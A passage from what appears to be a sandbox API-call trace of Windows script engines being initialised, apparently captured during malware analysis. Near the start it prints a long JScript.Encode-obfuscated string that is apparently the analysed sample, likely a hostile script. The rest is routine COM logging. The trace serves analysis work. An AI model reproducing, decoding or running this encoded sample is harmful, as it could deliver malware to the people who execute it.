cNamedArgs=0x0), pVarResult=0x18d8d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="#@~^kXcAAA==W!x^DkKxP^WTcV*\x09ODH\x09ax\x09+h,)mDk\\\x7fp64N+1YcJ\\dX:s cj+M\\n.oHSuP:n vcTr#IXRKw+\x09`r!2:JSJ4YO2=zz6C+(NGc^G:JVKo_VGL{JQVBWl^/nbp6Rdn\x09Nc#p.\x7fY;Mx,Fi)mmOm4`n#PDnO!Dx,Ti)8+{q+&pl{xnh~)1Yr\\\x7fpr(Ln^D`J\x09j1DrwD Utn^Vr#iStbs+v+Z'W b`DDXPA'mR2X2Cx92\x09\\rDGUs+UYUODbxLdvJ]Ar\x09NrDuE*i2{h3J-'/HdhKh\x7fc'-Ar\x09NWSdwKh+Md4+^V'--F T'-2WSnDktns^R+anriW'\x09nSP)1Yb\\+or(%+1YcJUm.raYk\x09LRwkV\x7fjz/D+sr8Ln^DJbi6;x1YrG\x09Pm[Uv#`YMzPDnDEMxPmR\"no\"+CNvJuFdH-'dW6Yhm.n-':bm.WdG6Yw-\x09nY,0.Cs+hG.0Pd+D;a-w\x09Na--7 cTRl!{ F-wdaJ#pNmmYm4cn#PD\x7fY;DU~ZiN86;x1YrG\x09PNc;*\x09a'\x09nSP)1Yb\\+or(%+1YcJt/ah^ RUnD7+Do\\JC:KhR\x7fRTE*iaRK2+\x09`E!AKJS;B0CVkn*iac/\x7fxNv#p;0\x09'CRA62C\x09N2\x09-kMWxsnUYUYMkUodcr]O+s2]'-Eb3ERd;(/ODbUT`;cVm/Y&x9n6}0cJJJbQ8#i!WxD'E6UQJcYswEi;WD'WR;.+mYnP\x7f6Yor^+cE6UD~OME\x7f~O8#pr0vEWY*\x09;WDR\x7fMrY\x7f`6c.n/aW\x09/nAG[H#IE6OR;VGd\x7f`#I;6'WR;.\x7flO\x7fK\x7f6Ywk^n`!0U~DD;n*iE6O'6RM\x7fOok^+vEWxObpEW/{;0DR62\x7fxbdP\x7f6O?D.\x7flhv#pE0kR\"nl9`+#pEW qDkDn`!0/c]nl9`!0ORjr.+R *bi!0d ;VWdnv#IE6 ;VGk+v#i6RGnV\x7fYnsbVnc!0xDbimRI!UcJ'Jr_;0UQr-EPJ5Eb+O~JxW.nkYCDDEB!S8#p0RG+^nY\x7fsrV\x7f`;W\x09#i)Nh4kV\x7fcZ0csbVn2arkYd`ab#PkWc1Nxcb{'T#P[vJE*i)N`rJ*I8vl 2\x09\\r.Kx:\x7fUYvJnMG^+k/r#b`ECr#xJbn6,`,P\x7f6Y 3\x09mGNbUTTl=bUZq&RVnYUY.k\x09oc,;Wx7nDDT)=o.WsAm/nv*jDDrxTcB\\x#;I&I28ycL}y]Fj!wXI\x7f!T|wOpI(Bt(\x7f#T\\(qKiMOylo]24ycOH/6Heq*V5o]\\1xV1xsIz[qj2(U$(.u^h\\.Y9(U)3`MoXI\x7fqs9M.H^XX4jVoz5qF^N!.zFwA-mys!m\x7f1;hK22pUA8._sS}#Zoxs9^N_#X(V]*1Mi1qF}7C\x7f\"N|:dV._VS}i9qCq6V}o(,q!oA12I-8qs24^T+rVgF1x9^4\x09]2( qtm\x7f*;\"M.sC\x7flVI_s;5qFa5Ts\"^y.O5sa*nZ46\\(mOPy95}qHZqog*1&I^4UX?\\\x7ft/\\\x7fHTm\x7f,!J3wymy#O5s6lKhsOtUorjs#:(M#%9M.V]V.d}q[4N!`kn?3k\x7f8H*1&]V(?Xj\\\x7f}kt\x7fg!lq1;S0.Dlpp;}o1\"}qqk(Cs/9\x7fVdtV.zpqHN}pgyoKW+j\x09#En?X2\\\x7ft2(:.An\x7flt4qs%Kq,0N\x096sF;9B40qV(\x7f1z\x7fjF-t_.d}U(k9!\\t(C1^|UX2\\\x7ftw(:#i\x7f(A^FZx1+`]s4V.\x095pIs#_VA}U(/&3HdI(1\"JwAq5saa5zXK\\\x7fsk}q}/5\x7fXymjHdI(1.J2wFNV194Vs.mzqd\x0981Xm2]V(?XH9\x7f6TCq14m2]A}\x09XV\\ sZ}jTw}X]j\x7f($s5x.a8M\"VmbX3}q}a4h.98y*\"N_BFI&]-1kori^IPmV#Nl\x09w/::sD}Uaqm\x7f]V5xsPm\x7fmkiCjk4Vs%qb6(jfV\"[V.OS^BV\\:asI&I28yc;pyok4!^E\\!174\x09tV(x]w( X\"oKW+i&\"t4s]4mspk9oA4^ssO}o]V1x\\2dV1s[AVOmVa^4\x09jE9MsZlq1E\":at\\&\\G&V988x\"w4qidKqs!5\x09Nst;q2rH]j\x7f($s5x.28VIsmbXA}\x09\\w(:.g}o]W( }W&3s;9:,Mt?&/q^$q5s6a5z6(CqIsp\x09sKm\x7f^d::.fiy6-N;aqlpx!9\x7fskqbA3`:#!9(B;jCVSt?S3jVoz5qF^N!.z^H3;jy#!U\x7fqA(M.Otq*T5o]a4+lM(Ms\x09mHLk`x#E9MsO\\?6ge\x7flt}y#Vqb3Fmh.T[o9;q;]j\x7f($s5x.28VIsmbXGmhjt9M.`+o$VnZVG6\x7ftq(:1ZC\x7fOEqV[4+8A4mhsO(;t8jVoXI\x7fqs9M.zFwA-mysZl\x09OEhKbkKqoE\\Mo!(&BXh?I`^xjV|jTL\x7f81ZmhV;t8!L9Aq\\\\C#d\\?68iVsz5qq^N!jXnsA7mys!m\x7f1EhK3d:\x7fs!tMw!42BXnUI`mU.sFj!L\x7f8H!1:s;\\F!LBwAz4yH^}ujX\\?3F9wH*1&]V(jo\"1 .De:X*njO$m_AA4+F4Cq*[rN2f9(Bz\\\x7f*T]V,O5qs!SV9V92s.my#YI:aw\\(\\Gn(6oCMjX}UqK5sw^5fpLnHbV(HXC(M1rI\x7f6$^21s4qBk+igtI t^q;qA(:}oxs0;:M,Ne(\"w4y*;j2AklppG(^6^qbs4dKo[d3.a[qsdmHLbjf^y9M.DSs]/(Z(w6KdVj\x7f*.e\x7f\\VKsoTlo}^K\x09.TCV,Vm.T3`&s\"9M.O}o1\"}qqb4u0E\" .Z._sh\\?Lk:\x7fs%1:,.8 \\!S^[24NHHSs.;^ysh}`Xt9Ms+\\jFs[Vt-}_\\b|PDX\\(I8ms*oxs#E1 oh\\j*4[M^ }`qsNVt7}uH;]y.TKq#!mM1VnZ9utoI}ms1Np\x09\"31:..mH(wd3sE9:1.\\?o08xj/4;a)|wY:+p1Ttq!;j\x09#E9MsO\\?*B8\x09Isms1Sj+jX9:VN}o\\EUMoE\\Mas`:.sp?4r}o^OKy9$}\x091T(w1Xm2]V(?Xj9\x7f*TCqFsS0s!N!jX(&A:}oB m\x7fHV1XX(I\x7f*08Mj?}qeG|A*^NzFKesws52}oU\x7fXT`CIzFUhV.qX.5\x09\\V::sZlotV:\x7f#!mM1V1X*_t(\"1}o]G4ypKqVNs[AF-}_#/\\j44(:IdtUq2S0s!NhOD\\?o04\x09#/(ZabnZ]H( I88M`w|UV2S;I5mh,%tqIqmsiwnKO1q!9X[V.8(jTT9uz,q!174\x09tV1x]N}L2!1:,D}:wy}:eTj2IHl\x09*UF;9\x09\x7foty\\XO*( sO[wV44jtDl#j(q.N_m_sl( aM(\x7faG1\x7f9Deja?\x7f\x094t5qFq4\x09V##y.pI2$yq:1d\":,!C_sHHsonjhw|q\x7fs$?sqwj.[Dj![-9.w782\\h4V4a\x7f0N4?s94CwV44o4Ym.#p1.Nue`wj5o4Dl#j(9.wdIo[A5joA\x7ff$e5.}D8C^3Kq]!+Atql!9ojAtj5y4yI3^Xmxt.\x09AF$?o]~I3\\n\"CN~+w[cts4Ij2^Xmswgt2I6Io4A\x7fq*t?o9VCVt%4saZ\x7fMOeI!sHtA}\"Iq]k}3\\2Us9bj\x09skt3XZ\x7ff$pgsw_ix^l.yB(js9W+hH*\x090}+}ZHH\x7fjts:21pe`Isj2[\\}og(:M1`pZX\x7fq:[vd&s+\x7f\x7fwUikDw4wo\x094`In.\x09}CCN9flZe65:Os\"Z,fn_3+48)7I34Igj%WlGov(&]\x7f5!sT5FAx[2js?Vs3\x7fs}\x09pi2*jZ6spZHHI!BX:sN9iZ6]ps[Ar!9pIj27m`23\\\x7fs|qM#XUV9^i!\\&pUOo}yN~pisK^Z62H`#}gL4O:stsn`6V}qstjh\\w:2Ix58$!9FB2m(2P\" mH\x09f4Apj$Jljj.H!w#\x09ws$SZsh`:tP:s9hn`6e}^oAHV^h\"j90p:t?5LHI\\so;dF9snj\":}\x09[652.oI!}h[Z*Vj`1|\\M#9UVIhiZ*i50o+NTg/:LVxNA**U($L5:B$\"CVA^Mg250(apsYGI/Y$6o3+1w)!\"fH#\"MVe\x09_m-HwLZlP~5g2%S\x7fVOL(F[r`:H/`..y6.Ic?o}apZV8}#s/]`s$?`4C53Bo5jsu^As4p`o2piwA\"f1yro2.\" 1Adys9UV9sCj\\&pUOoIsNwpisB[A6\x09?`X/}jo9:ZY}PyY31y]tIV06jjN:po2*jFV&`&[C\x7f3!Z[2Df?oHXK.o8HVs-[0,G5yAh\"VsT}j1B[_V3?`4&pVxs5js~jGHwt 1s5?15\x7fxA~FygKNy(-js}:IuN2t..i}^B*\x7fVsT9FA$i_N21Gt~piwA5\x7fm.NZB25j(h`FVa}2s\"njX2N8$B.q5l.%IB8A5q?j4A\\2Hq:stfi`Ie}s2H?!Oy\"MtNpN#Z`?dy9!1\"UM3S\\y\";.joBpq6AS+Is#;,\x09}0H|5K]}\"29BP:N$?w40lP~5gMmW58#x\x7fL4A\\MBq:MwXijwAp`HF.V.GK!wa}`s$p`HHt3HT\\j*$iAVUH^LSpiOyt:3X\x7fV[njVLhI&2p:V}yCV& 4^o2l^tM?\x09V\x09\x09_N31yH5q:1e` I$n`qTNN45piwA\"fA~KjBA`xo2\x7fC[\\dFIs}LAFp`ear`s5K+3\"]`.G}^G69y]TU.AB[AF9py4Xpi9\\5k%..`sA}MG\\tM#\"5!!W}:\\54_tFNyt~p#ja#^NHS825:F]#gMYo}`sVjoe7Is9x9Fs~py2nU3BA5js\"\\2IA]3wAKG)TlZ.~p#}hJ8I4}.]vtMa;tytt[N}jH8om.hI\\j2!l?\x09oCj:*y}ssT\"jw;i!w&4`[BI0smIT%-t_3q1_]sU3Bj\\xtUi`N$IN#0.\"49\"jsV.ZA&:M[A\"jo$5K}}t!aAp`Bi.s,.Hi93]0s$IsHvtk0Xtj.}6:s9jG4qNi\"Z5jsxNN]W\\LVh` 1T\"3.x\\j^A\x7fq1]j`V`j+IhC29fjj$qIjo$`js$}^s5\x7fj#~roz\\dF.5S8[wts#9Uy4%\"s9\"nsA\\H8##.b%7.z%\"#`F5\x7fj#A}s)-dF.}6:s9jG4qpi\"M5jsAjVBx}soD`?OqmFoXH3X&HotFNyt~p#}t[\x091U}o4153o$5.}de2W-Hq]INh9I53s~p^[;q.^hnX0-dF.56KwfIse-I^I\x09+os$}Z}fpUO91.o$5jsu8.I5.j4x.%w2Us9Nj:4A5joAg3HoU3s~}!\"cpos6lV9+rj%-6js\x09NN4\x7f`2]/5js}6:s9jG4qmT\"Z5jsVpZXWIxG*dX0X`?,W#y~1I`o$.NpHIU}}\\H%-H`HrmMBigX%-6j2-+wt~KijA5\x7ftNpN$\x7fqKBM9V)\"dX%Z82I6?:o!+A}A?o9%CAs$p`oA\x7f", varVal2=0x0), pExcepInfo=0x18d340*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x18d334*=0x0) returned 0x0 [0082.820] IUnknown:Release (This=0x2ee0b0) returned 0x1 [0082.938] DllGetClassObject (in: rclsid=0x3a6500*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7feffb16cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c858 | out: ppv=0x18c858*=0x2ee140) returned 0x0 [0082.938] JScriptEngine5:IClassFactory:CreateInstance (in: This=0x2ee140, pUnkOuter=0x0, riid=0x7fef6ad47a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18c8a8 | out: ppvObject=0x18c8a8*=0x2ed360) returned 0x0 [0082.938] GetUserDefaultLCID () returned 0x409 [0082.938] GetACP () returned 0x4e4 [0082.938] JScriptEngine5:IUnknown:Release (This=0x2ee140) returned 0x0 [0082.938] IUnknown:QueryInterface (in: This=0x2ed360, riid=0x7fef6ad47b0*(Data1=0xc7ef7658, Data2=0xe1ee, Data3=0x480e, Data4=([0]=0x97, [1]=0xea, [2]=0xd5, [3]=0x2c, [4]=0xb4, [5]=0xd7, [6]=0x6d, [7]=0x17)), ppvObject=0x18cb98 | out: ppvObject=0x18cb98*=0x2ed368) returned 0x0 [0082.938] IUnknown:AddRef (This=0x2ed360) returned 0x3 [0082.938] IUnknown:AddRef (This=0x2ed368) returned 0x4 [0082.938] IUnknown:QueryInterface (in: This=0x2ed360, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c9a0 | out: ppvObject=0x18c9a0*=0x2ed370) returned 0x0 [0082.939] IActiveScriptProperty:SetProperty (This=0x2ed370, dwProperty=0x70000001, pvarIndex=0x0, pvarValue=0x18c970*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x80004001 [0082.939] IUnknown:Release (This=0x2ed370) returned 0x4 [0082.939] IActiveScriptParse64:InitNew (This=0x2ed368) returned 0x0 [0082.939] IActiveScript:SetScriptSite (This=0x2ed360, pass=0x3f1c60) returned 0x0 [0082.939] GetCurrentThreadId () returned 0x678 [0082.939] IUnknown:QueryInterface (in: This=0x3f1c60, riid=0x7fef49a5d38*(Data1=0x539698a0, Data2=0xcdca, Data3=0x11cf, Data4=([0]=0xa5, [1]=0xeb, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x47, [6]=0xa0, [7]=0x63)), ppvObject=0x2eea88 | out: ppvObject=0x2eea88*=0x3f1c80) returned 0x0 [0082.939] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x18c890, nSize=0x27 | out: lpBuffer="") returned 0x0 [0082.939] IUnknown:AddRef (This=0x3f1c60) returned 0x3 [0082.939] IActiveScriptSite:GetLCID (in: This=0x3f1c60, plcid=0x18c9a8 | out: plcid=0x18c9a8*=0x409) returned 0x0 [0082.939] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0082.939] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x18c930, cchData=6 | out: lpLCData="1252") returned 5 [0082.939] IsValidCodePage (CodePage=0x4e4) returned 1 [0082.939] IActiveScriptSite:OnScriptTerminate (This=0x3f1c60, pvarResult=0x5, pexcepinfo=0x20) returned 0x0 [0082.939] IUnknown:QueryInterface (in: This=0x3f1c60, riid=0x7fef49a5dc8*(Data1=0xd6b96b0a, Data2=0x7463, Data3=0x402c, Data4=([0]=0x92, [1]=0xac, [2]=0x89, [3]=0x98, [4]=0x42, [5]=0x26, [6]=0x94, [7]=0x2f)), ppvObject=0x2ed640 | out: ppvObject=0x2ed640*=0x3f1c70) returned 0x0 [0082.939] IActiveScriptSiteDebug64:GetApplication (in: This=0x3f1c70, ppda=0x2ed650 | out: ppda=0x2ed650*=0x0) returned 0x8000ffff [0082.939] CoCreateInstance (in: rclsid=0x7fef49a5d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fef49a5d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x2ed6d0 | out: ppv=0x2ed6d0*=0x3d85b0) returned 0x0 [0082.939] IUnknown:AddRef (This=0x3d85b0) returned 0x2 [0082.939] GetCurrentProcessId () returned 0x674 [0082.939] GetCurrentThreadId () returned 0x678 [0082.939] GetTickCount () returned 0x3f60 [0082.940] ISystemDebugEventFire:BeginSession (This=0x3d85b0, guidSourceID=0x7fef49a5da8, strSessionName="JScript:00001652:00001656:18016224") returned 0x0 [0082.940] IActiveScript:GetScriptState (in: This=0x2ed360, pssState=0x18c9c0 | out: pssState=0x18c9c0*=5) returned 0x0 [0082.940] IActiveScript:SetScriptState (This=0x2ed360, ss=1) returned 0x0 [0082.940] IActiveScriptSite:OnScriptTerminate (This=0x3f1c60, pvarResult=0x1, pexcepinfo=0x0) returned 0x0 [0082.940] IActiveScript:AddNamedItem (This=0x2ed360, pstrName="window", dwFlags=0xe) returned 0x0 [0082.940] GetCurrentThreadId () returned 0x678 [0082.940] IActiveScriptSite:GetItemInfo (in: This=0x3f1c60, pstrName="window", dwReturnMask=0x1, ppiunkItem=0x18c870, ppti=0x0 | out: ppiunkItem=0x18c870*=0x3c92c0, ppti=0x0) returned 0x0 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6340*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x18c968 | out: ppvObject=0x18c968*=0x3c92c0) returned 0x0 [0082.940] IUnknown:Release (This=0x3c92c0) returned 0x6 [0082.940] IUnknown:AddRef (This=0x3c92c0) returned 0x7 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c8e8 | out: ppvObject=0x18c8e8*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c860 | out: ppvObject=0x18c860*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c868 | out: ppvObject=0x18c868*=0x3c92c0) returned 0x0 [0082.940] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c8d0 | out: ppv=0x18c8d0*=0x39ac80) returned 0x0 [0082.940] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c8a8 | out: ppvObject=0x18c8a8*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c820 | out: ppvObject=0x18c820*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c828 | out: ppvObject=0x18c828*=0x3c92c0) returned 0x0 [0082.940] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c890 | out: ppv=0x18c890*=0x39ac80) returned 0x0 [0082.940] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c8a8 | out: ppvObject=0x18c8a8*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c820 | out: ppvObject=0x18c820*=0x0) returned 0x80004002 [0082.940] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c828 | out: ppvObject=0x18c828*=0x3c92c0) returned 0x0 [0082.940] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c890 | out: ppv=0x18c890*=0x39ac80) returned 0x0 [0082.940] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.940] IUnknown:Release (This=0x3c92c0) returned 0x9 [0082.941] IUnknown:QueryInterface (in: This=0x2ed360, riid=0x7fef6ad47d0*(Data1=0xfe7c4271, Data2=0x210c, Data3=0x448d, Data4=([0]=0x9f, [1]=0x54, [2]=0x76, [3]=0xda, [4]=0xb7, [5]=0x4, [6]=0x7b, [7]=0x28)), ppvObject=0x3f1ce0 | out: ppvObject=0x3f1ce0*=0x2ed3a8) returned 0x0 [0082.941] IUnknown:QueryInterface (in: This=0x2ed360, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18cb00 | out: ppvObject=0x18cb00*=0x2ed370) returned 0x0 [0082.941] IActiveScriptProperty:SetProperty (This=0x2ed370, dwProperty=0x70000002, pvarIndex=0x0, pvarValue=0x18cad0*(varType=0xb, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xffff, varVal2=0x0)) returned 0x0 [0082.941] IUnknown:Release (This=0x2ed370) returned 0x5 [0082.941] IUnknown:Release (This=0x2ed360) returned 0x4 [0082.941] IUnknown:Release (This=0x2ed368) returned 0x3 [0082.941] IActiveScriptParse64:ParseScriptText (in: This=0x2ed368, pstrCode=" ", pstrItemName="window", punkContext=0x0, pstrDelimiter=0x0, dwSourceContextCookie=0xffffffffffffffff, ulStartingLineNumber=0x0, dwFlags=0x22, pvarResult=0x18cde0, pexcepinfo=0x0 | out: pvarResult=0x18cde0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2ec618, varVal2=0x368029df40000000), pexcepinfo=0x0) returned 0x0 [0082.941] GetCurrentThreadId () returned 0x678 [0082.942] IUnknown:AddRef (This=0x3f1c60) returned 0x5 [0082.942] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c9d8 | out: ppv=0x18c9d8*=0x39ac80) returned 0x0 [0082.942] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.942] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18ca28 | out: ppv=0x18ca28*=0x39ac80) returned 0x0 [0082.942] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.943] ISystemDebugEventFire:IsActive (This=0x3d85b0) returned 0x1 [0082.943] CoGetObjectContext (in: riid=0x7fef49a6350*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18c9c8 | out: ppv=0x18c9c8*=0x39ac80) returned 0x0 [0082.943] IUnknown:Release (This=0x39ac80) returned 0x1 [0082.943] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6370*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x18c6b8 | out: ppvObject=0x18c6b8*=0x0) returned 0x80004002 [0082.943] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a6518*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x18c630 | out: ppvObject=0x18c630*=0x0) returned 0x80004002 [0082.943] IUnknown:QueryInterface (in: This=0x3c92c0, riid=0x7fef49a64f8*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x18c638 | out: ppvObject=0x18c638*=0x3c92c0) returned 0x0 [0082.943] GetCurrentThreadId () returned 0x678 [0082.943] IActiveScriptSite:OnEnterScript (This=0x3f1c60) returned 0x0 [0082.943] GetCurrentThreadId () returned 0x678 [0082.943] IActiveScriptSite:OnLeaveScript (This=0x3f1c60) returned 0x0 [0082.943] ISystemDebugEventFire:IsActive (This=0x3d85b0) returned 0x1 [0082.944] IUnknown:Release (This=0x3f1c60) returned 0x4 [0082.945] GetCurrentThreadId () returned 0x678 [0082.954] DllGetClassObject (in: rclsid=0x3a65a0*(Data1=0xf414c262, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), riid=0x7feffb16cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x18b4a0 | out: ppv=0x18b4a0*=0x2ed8d0) returned 0x0 [0082.955] GetUserDefaultLCID () returned 0x409 [0082.955] GetACP () returned 0x4e4 [0082.955] IUnknown:AddRef (This=0x2eec30) returned 0x2 [0082.955] IUnknown:Release (This=0x2eec30) returned 0x1 [0082.955] JScriptEncode:IUnknown:Release (This=0x2ed8d0) returned 0x0 [0082.955] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x18c708 | out: ppvObject=0x18c708*=0x2eec30) returned 0x0 [0082.955] IUnknown:Release (This=0x2eec30) returned 0x1 [0082.955] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47b0*(Data1=0xc7ef7658, Data2=0xe1ee, Data3=0x480e, Data4=([0]=0x97, [1]=0xea, [2]=0xd5, [3]=0x2c, [4]=0xb4, [5]=0xd7, [6]=0x6d, [7]=0x17)), ppvObject=0x18c808 | out: ppvObject=0x18c808*=0x2eec38) returned 0x0 [0082.956] IUnknown:QueryInterface (in: This=0x2eec30, riid=0x7fef6ad47f0*(Data1=0x4954e0d0, Data2=0xfbc7, Data3=0x11d1, Data4=([0]=0x84, [1]=0x10, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x18c7e8 | out: ppvObject=0x18c7e8*=0x2eec40) returned 0x0 [0082.956] IActiveScriptProperty:SetProperty (This=0x2eec40, dwProperty=0x4000, 